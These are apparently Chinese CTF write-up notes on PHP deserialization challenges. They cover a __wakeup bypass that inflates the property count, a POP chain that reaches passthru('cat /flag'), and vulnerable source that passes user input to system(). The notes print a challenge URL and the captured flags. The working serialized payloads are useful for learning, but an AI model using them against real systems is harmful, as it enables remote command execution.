攻防世界
unserialize3
__wakeup绕过:可以通过增加对象的属性个数来进行绕过
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
echo(serialize($a));
?>
http://61.147.171.105:61734?code=O:4:"xctf":3:{s:4:"flag";s:3:"111";}
得到flag:cyberpeace{e40f96c8dc00bbd08233834d6c5aa473}
a1natas ctf
PHP_UNSERIALIZE ( 1 )
打开什么都没有
dirsearch
得到php文件
<?php
class ctf{
public $name;
public $type;
function __construct($name, $type){
$this->name = "AsaL1n";
$this->type = "web";
}
function __destruct(){
if($this->name==="newstar"&&$this->type==="winner"){
$cmd=$_POST['cmd'];
system($cmd);
}
}
}
$hello=$_POST["weber"];
if(isset($hello)){
unserialize($hello);
}
?>
编写playload
PHP_UNSERIALIZE ( 2 )
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctf{
public $name;
public $type;
function __construct($name, $type){
$this->name = "AsaL1n";
$this->type = "web";
}
function __destruct(){
echo md5($this->name);
}
}
class welcome{
public $web;
function __toString()
{
$func=$this->web;
return $func();
}
}
class world{
public $flag;
function __invoke(){
passthru($this->flag);
}
}
$hello=$_POST["weber"];
if(isset($hello)){
unserialize($hello);
}
?>
编写playload:
<?php
class ctf{
public $name;
public $type;
}
class welcome{
public $web;
}
class world{
public $flag;
}
$a=new ctf();
$a->name=new welcome();
$a->name->web=new world();
$a->name->web->flag="cat /flag";
echo (serialize($a));
?>
NSS
[SWPUCTF 2021 新生赛]no_wakeup
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag;
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>
<?php
class HaHaHa{
public $admin="admin";
public $passwd="wllm";
}
$a=new HaHaHa();
echo serialize($a);
?>